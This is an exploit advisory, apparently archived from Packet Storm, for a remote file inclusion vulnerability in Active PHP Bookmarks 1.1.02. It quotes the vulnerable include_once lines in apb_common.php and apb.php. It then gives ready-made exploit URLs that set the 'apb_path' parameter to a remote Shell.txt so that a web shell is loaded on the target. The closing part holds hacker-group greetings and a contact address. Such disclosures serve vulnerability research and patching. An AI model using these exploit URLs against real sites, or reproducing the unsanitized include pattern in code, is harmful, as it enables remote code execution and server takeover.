Active PHP Bookmarks version 1.1.02 suffers from a remote file inclusion flaw in apb.php.
562d5f36a0c1bd8997400a8490dc46e6ab7b2cebdb0163d553a3a8be4304e364Title : Active PHP Bookmarks (apb.php) Remote file include
########################################################################
#######
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}
------------------------------------------------------------------------
Sorce Code:
http://lbstone.com/apb/downloads/apb-1.1.02.zip
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Active PHP Bookmarks
Catégorie :Remote File Include
------------------------------------------------------------------------
-----
Vulnerable Code:
include_once($APB_SETTINGS['apb_path'].'apb_bookmark_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_group_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_view_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path']."apb_common.php"); (apb.php)
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/apb_common.php?APB_SETTINGS['apb_path']=Shell.txt?
http://www.VicTim.com/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=Shell.txt?
------------------------------------------------------------------------
----
greetz:
Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my
friends
Special Greeting:AsbMay's Group
channel:www.asb-may.net
contact:spoonman500[at]hotmail[dot]com
_________________________________________________________________
Testez Windows Llive Mail Beta !
http://www.msn.fr/newhotmail/Default.asp?Ath=f
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed